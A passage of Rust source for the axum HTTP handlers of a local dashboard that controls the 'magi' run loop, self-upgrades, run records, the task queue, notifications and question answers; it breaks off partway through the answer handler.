1829 merge: Option<String>,
1832 last_error: Option<String>,
1840 daemon: DaemonView,
1843}
1844
1845#[derive(Debug, Clone, Copy)]
1854struct Foreign {
1855 pid: Option<u32>,
1857}
1858
1859impl Foreign {
1860 fn of(reading: Option<&daemon::Reading>) -> Option<Self> {
1863 let reading = reading?;
1864 if !reading.running(Timestamp::now()) {
1865 return None;
1866 }
1867 match reading.pid {
1868 Some(pid) if pid == std::process::id() => None,
1869 pid => Some(Self { pid }),
1873 }
1874 }
1875
1876 fn who(&self) -> String {
1879 match self.pid {
1880 Some(pid) => format!("another magi process (pid {pid})"),
1881 None => "another magi process".to_owned(),
1882 }
1883 }
1884}
1885
1886type Launch = fn(daemon::Opts, daemon::Stop) -> Pin<Box<dyn Future<Output = Result<()>> + Send>>;
1891
1892fn launch_daemon(
1894 opts: daemon::Opts,
1895 stop: daemon::Stop,
1896) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
1897 Box::pin(daemon::serve_until(opts, stop))
1898}
1899
1900#[derive(Debug, Default)]
1902struct LoopState {
1903 live: Option<Live>,
1905 rev: u64,
1913 last_error: Option<String>,
1916}
1917
1918#[derive(Debug)]
1920struct Live {
1921 stop: daemon::Stop,
1923 handle: tokio::task::JoinHandle<()>,
1928 opts: daemon::Opts,
1932}
1933
1934impl Live {
1935 fn alive(&self) -> bool {
1937 !self.handle.is_finished()
1938 }
1939}
1940
1941fn lock_or_recover(state: &Mutex<LoopState>) -> MutexGuard<'_, LoopState> {
1948 state.lock().unwrap_or_else(PoisonError::into_inner)
1949}
1950
1951async fn loop_get(State(ui): State<Arc<Ui>>) -> ApiResult<Json<LoopView>> {
1953 blocking(move || {
1954 let reading = daemon::read_status(&ui.home);
1955 Ok(Json(ui.loop_view(reading)))
1956 })
1957 .await
1958}
1959
1960#[derive(Debug, Deserialize)]
1966#[serde(deny_unknown_fields)]
1967struct LoopCommand {
1968 running: bool,
1969 #[serde(default)]
1979 park: bool,
1980}
1981
1982async fn loop_post(
1990 State(ui): State<Arc<Ui>>,
1991 body: std::result::Result<Json<LoopCommand>, JsonRejection>,
1992) -> ApiResult<Json<LoopView>> {
1993 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
1996 blocking(move || {
1997 let reading = daemon::read_status(&ui.home);
1998 let foreign = Foreign::of(reading.as_ref());
1999 if body.running {
2000 ui.start_loop(foreign)?;
2001 } else {
2002 ui.stop_loop(foreign, body.park)?;
2003 }
2004 Ok(Json(ui.loop_view(reading)))
2005 })
2006 .await
2007}
2008
2009#[derive(Debug, Serialize)]
2011struct UpgradeView {
2012 from: String,
2014 to: Option<String>,
2016 parked: Option<String>,
2018 detail: String,
2020}
2021
2022async fn upgrade_post(State(ui): State<Arc<Ui>>) -> ApiResult<(StatusCode, Json<UpgradeView>)> {
2046 let reading = daemon::read_status(&ui.home);
2047 if let Some(other) = Foreign::of(reading.as_ref()) {
2048 return Err(ApiError::conflict(format!(
2049 "the loop belongs to {}, so replacing this binary would leave \
2050 that process running an old one against the same queue. Upgrade \
2051 where it was started.",
2052 other.who()
2053 )));
2054 }
2055
2056 if crate::updater::disabled_by_env() {
2062 return Ok((
2063 StatusCode::OK,
2064 Json(UpgradeView {
2065 from: env!("CARGO_PKG_VERSION").to_owned(),
2066 to: None,
2067 parked: None,
2068 detail: format!(
2069 "Automatic updates are disabled by {}. Nothing was parked \
2070 and nothing restarted.",
2071 crate::updater::NO_AUTOUPDATE_ENV
2072 ),
2073 }),
2074 ));
2075 }
2076
2077 let (cfg, _) = Config::discover(&ui.repo, None).unwrap_or_default();
2082 let from = env!("CARGO_PKG_VERSION").to_owned();
2083 let latest = match crate::updater::Checker::new(&cfg.update) {
2084 Some(checker) => checker
2085 .newer_release()
2086 .await
2087 .map_err(|e| ApiError::internal(format!("check for a release: {e:#}")))?,
2088 None => None,
2089 };
2090 let Some(latest) = latest else {
2091 return Ok((
2092 StatusCode::OK,
2093 Json(UpgradeView {
2094 from,
2095 to: None,
2096 parked: None,
2097 detail: "Already on the newest release. Nothing was parked \
2098 and nothing restarted."
2099 .to_owned(),
2100 }),
2101 ));
2102 };
2103
2104 let parked = ui.park_for_upgrade()?;
2107 let detail = match &parked {
2108 Some(run) => format!(
2113 "Run {} is parking at its next step, which can take as long as \
2114 the step it is on - up to an hour for an implement wave. The \
2115 deck replaces itself once it parks, comes back, and the loop \
2116 carries that run on from where it stopped. Nothing is lost if \
2117 you close this.",
2118 crate::run::short_of(run)
2119 ),
2120 None => "The deck replaces itself and comes back. Nothing was in \
2121 flight to park."
2122 .to_owned(),
2123 };
2124
2125 let mut progress = updater::Progress::new(from.clone(), latest.tag_name.clone());
2129 progress.parked_run = parked.clone();
2130 let _ = updater::write_progress(&ui.home, &progress);
2131
2132 let home = ui.home.clone();
2133 tokio::spawn(async move {
2134 if let Err(e) = upgrade_and_restart(home.clone()).await {
2135 tracing::error!("the upgrade did not complete: {e:#}");
2136 if let Some(mut progress) = updater::read_progress(&home) {
2137 progress.fail(format!("{e:#}"));
2138 let _ = updater::write_progress(&home, &progress);
2139 }
2140 }
2141 });
2142
2143 Ok((
2144 StatusCode::ACCEPTED,
2145 Json(UpgradeView {
2146 from,
2147 to: Some(latest.tag_name),
2148 parked,
2149 detail,
2150 }),
2151 ))
2152}
2153
2154async fn upgrade_and_restart(home: PathBuf) -> Result<()> {
2159 crate::updater::run_self_update(true, false, true).await?;
2162 tracing::info!("binary replaced - asking the server to hand over");
2163 if let Some(mut progress) = updater::read_progress(&home) {
2164 progress.advance(updater::Stage::Replaced);
2165 let _ = updater::write_progress(&home, &progress);
2166 }
2167 HANDOVER.notify_one();
2168 Ok(())
2169}
2170
2171#[derive(Debug, Serialize)]
2177struct RunSummary {
2178 id: String,
2179 short: String,
2180 status: String,
2181 done: bool,
2182 instruction: String,
2183 title: String,
2184 repo: String,
2185 repo_name: String,
2186 created_at: String,
2187 updated_at: String,
2188 candidates: usize,
2189 viable: usize,
2190 judges: usize,
2191 winner: Option<char>,
2192 reviews: usize,
2193 quota_losses: usize,
2194 event: Option<String>,
2195 superseded_by: Option<String>,
2200 waiting: bool,
2207 live: crate::run::Liveness,
2211 pr: Option<crate::run::PrRecord>,
2213 unmerged_by_design: bool,
2219}
2220
2221impl RunSummary {
2222 fn of(state: &RunState, waiting: bool, live: crate::run::Liveness) -> Self {
2223 Self {
2224 id: state.id.clone(),
2225 short: state.short().to_owned(),
2226 status: status_word(state.status),
2227 done: state.status.done(),
2228 unmerged_by_design: state.unmerged_by_design(),
2229 instruction: state.instruction.clone(),
2230 title: title_from(&state.instruction, TITLE_MAX),
2231 repo: state.repo.display().to_string(),
2232 repo_name: state
2233 .repo
2234 .file_name()
2235 .map(|n| n.to_string_lossy().into_owned())
2236 .unwrap_or_default(),
2237 created_at: state.created_at.to_string(),
2238 updated_at: state.updated_at.to_string(),
2239 candidates: state.candidates.len(),
2240 viable: state.viable().len(),
2241 judges: state.config.graph.judges,
2242 winner: state.winner().map(|c| c.label),
2243 reviews: state.reviews.len(),
2244 quota_losses: state.quota.len(),
2245 event: state.events.last().map(|e| e.message.clone()),
2246 waiting,
2247 live,
2248 superseded_by: None,
2251 pr: state.pr.clone(),
2252 }
2253 }
2254}
2255
2256fn status_word(status: RunStatus) -> String {
2259 status.as_str().to_owned()
2263}
2264
2265#[derive(Debug, Deserialize)]
2267struct ListQuery {
2268 #[serde(default)]
2269 limit: Option<usize>,
2270}
2271
2272async fn runs_list(
2273 State(ui): State<Arc<Ui>>,
2274 Query(q): Query<ListQuery>,
2275) -> ApiResult<Json<Vec<RunSummary>>> {
2276 let limit = q.limit.unwrap_or(LIST_DEFAULT).min(LIST_MAX);
2277 blocking(move || {
2278 let superseded = ui.queue.superseded();
2279 let open_runs: HashSet<String> = ui
2283 .questions
2284 .list()
2285 .into_iter()
2286 .filter(|q| q.status.open())
2287 .map(|q| q.run)
2288 .collect();
2289 let claimed: HashSet<String> =
2290 crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2291 .into_iter()
2292 .map(|c| c.run)
2293 .collect();
2294 let states = run_ids(&ui.runs)
2295 .into_iter()
2296 .filter_map(|id| read_run(&ui.runs, &id).ok())
2301 .take(limit);
2302 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::real());
2303 let summaries = summarize(
2304 states,
2305 &open_runs,
2306 &claimed,
2307 &superseded,
2308 |p| probe.borrow_mut().status(p),
2309 |p| probe.borrow_mut().started_at(p),
2310 );
2311 Ok(Json(summaries))
2312 })
2313 .await
2314}
2315
2316fn summarize<I, S, D>(
2322 states: I,
2323 open_runs: &HashSet<String>,
2324 claimed: &HashSet<String>,
2325 superseded: &HashMap<String, String>,
2326 mut status_q: S,
2327 mut identity_q: D,
2328) -> Vec<RunSummary>
2329where
2330 I: IntoIterator<Item = RunState>,
2331 S: FnMut(u32) -> Option<bool>,
2332 D: FnMut(u32) -> Option<String>,
2333{
2334 states
2335 .into_iter()
2336 .map(|state| {
2337 let waiting = open_runs.contains(&state.id);
2338 let live =
2339 state.liveness_with(claimed.contains(&state.id), &mut status_q, &mut identity_q);
2340 let mut row = RunSummary::of(&state, waiting, live);
2341 row.superseded_by = superseded
2342 .get(&state.id)
2343 .map(String::as_str)
2344 .map(crate::run::short_of)
2345 .map(str::to_owned);
2346 row
2347 })
2348 .collect()
2349}
2350
2351#[derive(Debug, Serialize)]
2358struct RunDetailView {
2359 #[serde(flatten)]
2360 state: RunState,
2361 instruction_md: Vec<md::Node>,
2362 live: crate::run::Liveness,
2377 unmerged_by_design: bool,
2382 superseded_by: Option<String>,
2390 latest_attempt: Option<LatestAttempt>,
2404}
2405
2406#[derive(Debug, Serialize)]
2408struct LatestAttempt {
2409 id: String,
2410 short: String,
2411 resolved: bool,
2422}
2423
2424impl RunDetailView {
2425 fn of(
2426 state: RunState,
2427 live: crate::run::Liveness,
2428 superseded_by: Option<String>,
2429 latest_attempt: Option<LatestAttempt>,
2430 ) -> Self {
2431 Self {
2432 instruction_md: md::to_nodes(&state.instruction, &md::ImageBase::None),
2433 live,
2434 unmerged_by_design: state.unmerged_by_design(),
2435 superseded_by,
2436 latest_attempt,
2437 state,
2438 }
2439 }
2440}
2441
2442async fn run_detail(
2443 State(ui): State<Arc<Ui>>,
2444 Path(id): Path<String>,
2445) -> ApiResult<Json<RunDetailView>> {
2446 blocking(move || {
2447 let id = resolve_run(&ui.runs, &id)?;
2448 let state = read_run(&ui.runs, &id)?;
2449 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2450 let live = state.liveness(daemon_claims);
2451 let superseded_by = ui
2452 .queue
2453 .superseded_by(&id)
2454 .as_deref()
2455 .map(crate::run::short_of)
2456 .map(str::to_owned);
2457 let latest_attempt = ui.queue.latest_attempt(&id).and_then(|head_id| {
2461 read_run(&ui.runs, &head_id).ok().map(|head| LatestAttempt {
2462 short: head.short().to_owned(),
2463 resolved: matches!(head.status, RunStatus::Merged | RunStatus::Ready),
2464 id: head.id,
2465 })
2466 });
2467 Ok(Json(RunDetailView::of(
2468 state,
2469 live,
2470 superseded_by,
2471 latest_attempt,
2472 )))
2473 })
2474 .await
2475}
2476
2477async fn run_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2486 let (id, unreadable) = {
2487 let ui = Arc::clone(&ui);
2488 blocking(move || {
2489 let id = resolve_run(&ui.runs, &id)?;
2490 match read_run(&ui.runs, &id) {
2491 Ok(state) => {
2492 let in_flight =
2493 crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2494 state
2495 .ensure_can_delete(in_flight)
2496 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
2497 let dir = ui.runs.join(&id);
2498 std::fs::remove_dir_all(&dir)
2499 .with_context(|| format!("remove run directory {}", dir.display()))?;
2500 Ok((id, false))
2501 }
2502 Err(_) => {
2503 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2507 return Err(ApiError::conflict(format!(
2508 "run {id} is being worked on by a live daemon right now"
2509 )));
2510 }
2511 Ok((id, true))
2512 }
2513 }
2514 })
2515 .await?
2516 };
2517 if unreadable {
2518 crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2519 .await
2520 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2521 }
2522 let ui = Arc::clone(&ui);
2523 let done = id.clone();
2524 blocking(move || {
2525 ui.questions.abandon_for_run(
2528 &done,
2529 &format!("run {done} was deleted, so nothing is waiting for this answer"),
2530 )?;
2531 Ok(())
2532 })
2533 .await?;
2534 Ok(StatusCode::NO_CONTENT)
2535}
2536
2537async fn run_fold(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Json<FoldView>> {
2561 let (id, state) = {
2562 let ui = Arc::clone(&ui);
2563 blocking(move || {
2564 let id = resolve_run(&ui.runs, &id)?;
2565 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2566 return Err(ApiError::conflict(format!(
2567 "run {id} is being worked on by a live daemon right now"
2568 )));
2569 }
2570 let state = read_run(&ui.runs, &id).ok();
2571 Ok((id, state))
2572 })
2573 .await?
2574 };
2575 let removed = match state {
2576 Some(mut state) => {
2577 let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2578 .await
2579 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2580 if removed.is_empty() {
2585 crate::clean::clear_abandoned_active(&mut state, &ui.home, jiff::Timestamp::now())
2586 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2587 }
2588 removed
2589 }
2590 None => crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2591 .await
2592 .map_err(|e| ApiError::internal(format!("{e:#}")))?,
2593 };
2594 Ok(Json(FoldView {
2595 run: id,
2596 removed_count: removed.len(),
2597 removed,
2598 }))
2599}
2600
2601#[derive(Debug, Serialize)]
2603struct FoldView {
2604 run: String,
2605 removed: Vec<String>,
2607 removed_count: usize,
2608}
2609
2610#[derive(Debug, Deserialize)]
2613struct FoldMergedBody {
2614 #[serde(default)]
2615 pr_url: String,
2616}
2617
2618async fn run_fold_merged(
2638 State(ui): State<Arc<Ui>>,
2639 Path(id): Path<String>,
2640 Json(body): Json<FoldMergedBody>,
2641) -> ApiResult<Json<FoldMergedView>> {
2642 let pr_url = body.pr_url.trim().to_owned();
2643 if pr_url.is_empty() {
2644 return Err(ApiError::bad_request("pr_url is required"));
2645 }
2646 let (id, mut state) = {
2647 let ui = Arc::clone(&ui);
2648 blocking(move || {
2649 let id = resolve_run(&ui.runs, &id)?;
2650 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2651 return Err(ApiError::conflict(format!(
2652 "run {id} is being worked on by a live daemon right now"
2653 )));
2654 }
2655 let state = read_run(&ui.runs, &id)?;
2656 Ok((id, state))
2657 })
2658 .await?
2659 };
2660 let (before, after) = crate::land::correct_manual_merge(&mut state, &pr_url)
2661 .await
2662 .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
2663 let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2664 .await
2665 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2666 Ok(Json(FoldMergedView {
2667 run: id,
2668 before: before.as_str().to_owned(),
2669 after: after.as_str().to_owned(),
2670 removed,
2671 }))
2672}
2673
2674#[derive(Debug, Serialize)]
2676struct FoldMergedView {
2677 run: String,
2678 before: String,
2680 after: String,
2682 removed: Vec<String>,
2684}
2685
2686async fn run_resume(
2706 State(ui): State<Arc<Ui>>,
2707 Path(id): Path<String>,
2708) -> ApiResult<(StatusCode, Json<RunSummary>)> {
2709 let (id, state) = {
2710 let ui = Arc::clone(&ui);
2711 blocking(move || {
2712 let id = resolve_run(&ui.runs, &id)?;
2713 let state = read_run(&ui.runs, &id)?;
2714 Ok((id, state))
2715 })
2716 .await?
2717 };
2718 if !state.status.resumable() {
2719 return Err(ApiError::conflict(format!(
2720 "run {} is `{}`, and only a stalled or blocked run can be resumed",
2721 state.short(),
2722 status_word(state.status)
2723 )));
2724 }
2725 if let Some(work) = crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2730 .into_iter()
2731 .next()
2732 {
2733 return Err(ApiError::conflict(format!(
2734 "the loop is running run {} right now; stop it first, or wait for \
2735 it to finish, before resuming a run by hand.",
2736 crate::run::short_of(&work.run)
2737 )));
2738 }
2739 let _resume = ui.begin_resume(&id)?;
2740
2741 let queued = RunSummary::of(
2744 &state,
2745 !ui.questions.open_for(&id).is_empty(),
2746 state.liveness(false),
2747 );
2748 let run = id.clone();
2749 tokio::spawn(async move {
2750 let _resume = _resume;
2751 match crate::graph::Runner::resume(&run) {
2752 Ok(mut runner) => {
2753 if let Err(e) = runner.execute().await {
2754 tracing::warn!("resume of run {run} stopped: {e:#}");
2755 }
2756 }
2757 Err(e) => tracing::warn!("run {run} could not be resumed: {e:#}"),
2760 }
2761 });
2762 Ok((StatusCode::ACCEPTED, Json(queued)))
2763}
2764
2765async fn run_report(
2766 State(ui): State<Arc<Ui>>,
2767 Path(id): Path<String>,
2768) -> ApiResult<impl IntoResponse> {
2769 let text = blocking(move || {
2770 let id = resolve_run(&ui.runs, &id)?;
2771 let state = read_run(&ui.runs, &id)?;
2775 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2776 let live = state.liveness(daemon_claims);
2777 Ok(format!(
2778 "{}{}",
2779 report::run(&state),
2780 report::active_seats(&state, live)
2781 ))
2782 })
2783 .await?;
2784 Ok(([(header::CONTENT_TYPE, "text/plain; charset=utf-8")], text))
2785}
2786
2787#[derive(Debug, Serialize)]
2793struct TaskView {
2794 #[serde(flatten)]
2795 task: Task,
2796 source_label: String,
2797 status_str: &'static str,
2798 instruction_md: Vec<md::Node>,
2802 waits_on: Vec<String>,
2806 stuck_roots: Vec<String>,
2809}
2810
2811impl From<Task> for TaskView {
2812 fn from(task: Task) -> Self {
2813 Self {
2814 source_label: task.source.label(),
2815 status_str: task.status.as_str(),
2816 instruction_md: md::to_nodes(&task.instruction, &md::ImageBase::None),
2817 waits_on: Vec::new(),
2818 stuck_roots: Vec::new(),
2819 task,
2820 }
2821 }
2822}
2823
2824impl TaskView {
2825 fn with_inventory(task: Task, inv: &crate::blockers::Inventory) -> Self {
2826 let waits_on = inv.waits_on(&task);
2827 let stuck_roots = inv
2828 .stuck_roots(&task)
2829 .iter()
2830 .map(|r| r.rsplit('-').next().unwrap_or(r).to_owned())
2831 .collect();
2832 Self {
2833 waits_on,
2834 stuck_roots,
2835 ..Self::from(task)
2836 }
2837 }
2838}
2839
2840#[derive(Debug, Default, Deserialize)]
2843#[serde(default)]
2844struct ReposQuery {
2845 refresh: u8,
2846}
2847
2848async fn repos_list(
2855 State(ui): State<Arc<Ui>>,
2856 Query(q): Query<ReposQuery>,
2857) -> ApiResult<Json<Vec<repos::Repo>>> {
2858 let refresh = q.refresh != 0;
2859 blocking(move || {
2860 let (cfg, _) = Config::discover(&ui.repo, None)?;
2861 Ok(Json(ui.repos_cache.list(
2862 &cfg.repos.roots,
2863 Duration::from_secs(cfg.repos.scan_ttl),
2864 refresh,
2865 )))
2866 })
2867 .await
2868}
2869
2870async fn queue_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TaskView>>> {
2871 blocking(move || {
2872 let tasks = ui.queue.list();
2873 let inv = crate::blockers::Inventory::new(tasks.clone(), &ui.questions.list());
2874 Ok(Json(
2875 tasks
2876 .into_iter()
2877 .map(|t| TaskView::with_inventory(t, &inv))
2878 .collect(),
2879 ))
2880 })
2881 .await
2882}
2883
2884#[derive(Debug, Default, Deserialize)]
2887#[serde(default, deny_unknown_fields)]
2888struct HoldBody {
2889 reason: Option<String>,
2890}
2891
2892async fn queue_hold(
2893 State(ui): State<Arc<Ui>>,
2894 Path(id): Path<String>,
2895 body: std::result::Result<Json<HoldBody>, JsonRejection>,
2896) -> ApiResult<Json<TaskView>> {
2897 let body = match body {
2901 Ok(Json(body)) => body,
2902 Err(JsonRejection::MissingJsonContentType(_)) => HoldBody::default(),
2903 Err(e) => return Err(ApiError::bad_request(e.body_text())),
2904 };
2905 let reason = body.reason.filter(|r| !r.trim().is_empty());
2906 mutate(ui, id, move |t| {
2907 t.hold_manual(reason.clone());
2908 Ok(())
2909 })
2910 .await
2911}
2912
2913async fn queue_release(
2914 State(ui): State<Arc<Ui>>,
2915 Path(id): Path<String>,
2916) -> ApiResult<Json<TaskView>> {
2917 mutate(ui, id, |t| {
2918 t.release();
2919 Ok(())
2920 })
2921 .await
2922}
2923
2924#[derive(Debug, Deserialize)]
2926#[serde(deny_unknown_fields)]
2927struct PriorityBody {
2928 priority: i32,
2929}
2930
2931async fn queue_priority(
2937 State(ui): State<Arc<Ui>>,
2938 Path(id): Path<String>,
2939 body: std::result::Result<Json<PriorityBody>, JsonRejection>,
2940) -> ApiResult<Json<TaskView>> {
2941 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
2942 mutate(ui, id, move |t| t.set_priority(body.priority)).await
2943}
2944
2945#[derive(Debug, Deserialize)]
2947#[serde(deny_unknown_fields)]
2948struct EditBody {
2949 title: String,
2950 instruction: String,
2951}
2952
2953async fn queue_edit(
2957 State(ui): State<Arc<Ui>>,
2958 Path(id): Path<String>,
2959 body: std::result::Result<Json<EditBody>, JsonRejection>,
2960) -> ApiResult<Json<TaskView>> {
2961 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
2962 mutate(ui, id, move |t| {
2963 t.edit(body.title.clone(), body.instruction.clone())
2964 })
2965 .await
2966}
2967
2968async fn queue_done(
2976 State(ui): State<Arc<Ui>>,
2977 Path(id): Path<String>,
2978) -> ApiResult<Json<TaskView>> {
2979 mutate(ui, id, |t| {
2980 t.succeed();
2981 Ok(())
2982 })
2983 .await
2984}
2985
2986async fn queue_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2994 blocking(move || {
2995 let id = resolve_task(&ui.queue, &id)?;
2996 let in_flight = crate::daemon::is_working_on_task(&ui.home, &id, jiff::Timestamp::now());
2997 ui.queue
2998 .remove(&id, in_flight, &ui.questions)
2999 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
3000 Ok(StatusCode::NO_CONTENT)
3001 })
3002 .await
3003}
3004
3005async fn mutate(
3014 ui: Arc<Ui>,
3015 id: String,
3016 change: impl FnOnce(&mut Task) -> Result<()> + Send + 'static,
3017) -> ApiResult<Json<TaskView>> {
3018 blocking(move || {
3019 let id = resolve_task(&ui.queue, &id)?;
3020 let _claim = ui.queue.claim(&id).map_err(|e| {
3025 ApiError::conflict(format!(
3026 "{e:#} - a daemon is running this task, so it cannot be \
3027 changed from here yet"
3028 ))
3029 })?;
3030 let mut task = ui.queue.get(&id)?;
3031 change(&mut task).map_err(ApiError::bad_request_from)?;
3032 ui.queue.put(&mut task)?;
3033 Ok(Json(TaskView::from(task)))
3034 })
3035 .await
3036}
3037
3038async fn events(State(ui): State<Arc<Ui>>) -> impl IntoResponse {
3046 let (tx, rx) = tokio::sync::mpsc::channel::<Event>(4);
3047 tokio::spawn(async move {
3048 let mut ticker = tokio::time::interval(POLL);
3049 let mut last: Option<(u64, u64, u64, u64, u64, u64)> = None;
3050 loop {
3051 ticker.tick().await;
3054 let state = Arc::clone(&ui);
3055 let revisions = tokio::task::spawn_blocking(move || {
3056 (
3057 state.queue.revision(),
3058 runs_revision(&state.runs),
3059 state.questions.revision(),
3060 state.talks.revision(),
3061 state.notices.revision(),
3062 state.lock_loop().rev,
3066 )
3067 })
3068 .await;
3069 let Ok(revisions) = revisions else { break };
3070 if last == Some(revisions) {
3071 continue;
3072 }
3073 last = Some(revisions);
3074 let payload = serde_json::json!({
3075 "queue_rev": revisions.0,
3076 "runs_rev": revisions.1,
3077 "questions_rev": revisions.2,
3078 "talks_rev": revisions.3,
3079 "notifications_rev": revisions.4,
3080 "loop_rev": revisions.5,
3081 });
3082 let Ok(event) = Event::default().event("change").json_data(payload) else {
3084 break;
3085 };
3086 if tx.send(event).await.is_err() {
3087 break;
3088 }
3089 }
3090 });
3091 Sse::new(ReceiverStream::new(rx).map(Ok::<Event, Infallible>))
3092 .keep_alive(KeepAlive::new().interval(KEEPALIVE))
3093}
3094
3095fn runs_revision(runs: &FsPath) -> u64 {
3102 use std::hash::{Hash as _, Hasher as _};
3103
3104 let mut entries: Vec<(String, u64)> = std::fs::read_dir(runs)
3105 .into_iter()
3106 .flatten()
3107 .flatten()
3108 .filter_map(|e| {
3109 let path = e.path().join("run.json");
3110 let mtime = path
3111 .metadata()
3112 .ok()?
3113 .modified()
3114 .ok()?
3115 .duration_since(std::time::UNIX_EPOCH)
3116 .ok()?
3117 .as_millis() as u64;
3118 let id = e.file_name().to_string_lossy().into_owned();
3119 Some((id, mtime))
3120 })
3121 .collect();
3122
3123 if entries.is_empty() {
3124 return 0;
3125 }
3126
3127 entries.sort_unstable();
3128 let mut hasher = std::hash::DefaultHasher::new();
3129 for (id, mtime) in &entries {
3130 id.hash(&mut hasher);
3131 mtime.hash(&mut hasher);
3132 }
3133 let h = hasher.finish();
3134 if h == 0 { 1 } else { h }
3135}
3136
3137fn run_ids(runs: &FsPath) -> Vec<String> {
3143 let mut ids: Vec<String> = std::fs::read_dir(runs)
3144 .into_iter()
3145 .flatten()
3146 .flatten()
3147 .filter(|e| e.path().join("run.json").is_file())
3148 .map(|e| e.file_name().to_string_lossy().into_owned())
3149 .collect();
3150 ids.sort_unstable_by(|a, b| b.cmp(a));
3152 ids
3153}
3154
3155fn read_run(runs: &FsPath, id: &str) -> Result<RunState> {
3157 let path = runs.join(id).join("run.json");
3158 let body =
3159 std::fs::read_to_string(&path).with_context(|| format!("read {}", path.display()))?;
3160 let state: RunState =
3161 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
3162 if state.schema != run::SCHEMA {
3163 anyhow::bail!(
3164 "run {} was written by a different magi (schema {}, this build speaks {})",
3165 state.id,
3166 state.schema,
3167 run::SCHEMA
3168 );
3169 }
3170 Ok(state)
3171}
3172
3173#[must_use]
3181pub fn runs_unreadable(runs: &FsPath) -> usize {
3182 run_ids(runs)
3183 .into_iter()
3184 .filter(|id| read_run(runs, id).is_err())
3185 .count()
3186}
3187
3188fn resolve_run(runs: &FsPath, id: &str) -> ApiResult<String> {
3190 if runs.join(id).join("run.json").is_file() {
3191 return Ok(id.to_owned());
3192 }
3193 pick(run_ids(runs), id, "run")
3194}
3195
3196fn resolve_task(queue: &Queue, id: &str) -> ApiResult<String> {
3198 if queue.path_of(id).is_file() {
3199 return Ok(id.to_owned());
3200 }
3201 pick(queue.list().into_iter().map(|t| t.id).collect(), id, "task")
3202}
3203
3204#[derive(Debug, Serialize)]
3215struct QuestionView {
3216 #[serde(flatten)]
3217 question: Question,
3218 detail_md: Vec<md::Node>,
3219 waiting_on_agent: bool,
3229}
3230
3231impl From<Question> for QuestionView {
3232 fn from(question: Question) -> Self {
3233 let base = md::ImageBase::QuestionPanel {
3234 id: question.id.clone(),
3235 };
3236 Self {
3237 detail_md: md::to_nodes(&question.detail, &base),
3238 waiting_on_agent: question.waiting_on_agent(),
3239 question,
3240 }
3241 }
3242}
3243
3244async fn questions_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<QuestionView>>> {
3250 blocking(move || {
3251 Ok(Json(
3252 ui.questions
3253 .list()
3254 .into_iter()
3255 .map(QuestionView::from)
3256 .collect(),
3257 ))
3258 })
3259 .await
3260}
3261
3262async fn notifications_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3265 blocking(move || {
3266 let items = ui.notices.list();
3267 let unread = items.iter().filter(|n| n.unread()).count();
3268 Ok(Json(
3269 serde_json::json!({ "unread": unread, "items": items }),
3270 ))
3271 })
3272 .await
3273}
3274
3275fn notice_error(e: anyhow::Error) -> ApiError {
3276 ApiError::not_found(format!("{e:#}"))
3279}
3280
3281async fn notification_read(
3283 State(ui): State<Arc<Ui>>,
3284 Path(id): Path<String>,
3285) -> ApiResult<Json<Notice>> {
3286 blocking(move || ui.notices.mark_read(&id).map(Json).map_err(notice_error)).await
3287}
3288
3289async fn notification_dismiss(
3291 State(ui): State<Arc<Ui>>,
3292 Path(id): Path<String>,
3293) -> ApiResult<Json<Notice>> {
3294 blocking(move || ui.notices.dismiss(&id).map(Json).map_err(notice_error)).await
3295}
3296
3297async fn notifications_read_all(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3299 blocking(move || {
3300 let changed = ui.notices.mark_all_read()?;
3301 Ok(Json(serde_json::json!({ "marked": changed })))
3302 })
3303 .await
3304}
3305
3306#[derive(Debug, Default, Deserialize)]
3312#[serde(default, deny_unknown_fields)]
3313struct NewAnswer {
3314 choice: Option<String>,
3315 text: Option<String>,
3316}
3317
3318async fn question_answer(
3319 State(ui): State<Arc<Ui>>,
3320 Path(id): Path<String>,
3321 body: std::result::Result<Json<NewAnswer>, axum::extract::rejection::JsonRejection>,
3322) -> ApiResult<Json<QuestionView>> {
3323 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3324 let answer = match (body.choice, body.text) {
3325 (Some(c), None) => Answer::Choice(c),
3326 (None, Some(t)) => Answer::Text(t),
3327 (Some(_), Some(_)) => {
3328 return Err(ApiError::bad_request(
3329 "send either `choice` or `text`, not both",
3330 ));
3331 }
3332 (None, None) => {
3333 return Err(ApiError::bad_request("send a `choice` or a `text`"));
3334 }
3335 };
3336
3337 blocking(move || {
3338 let id = resolve_question(&ui.questions, &id)?;
3339 let mut q = ui
3340 .questions
3341 .get(&id)
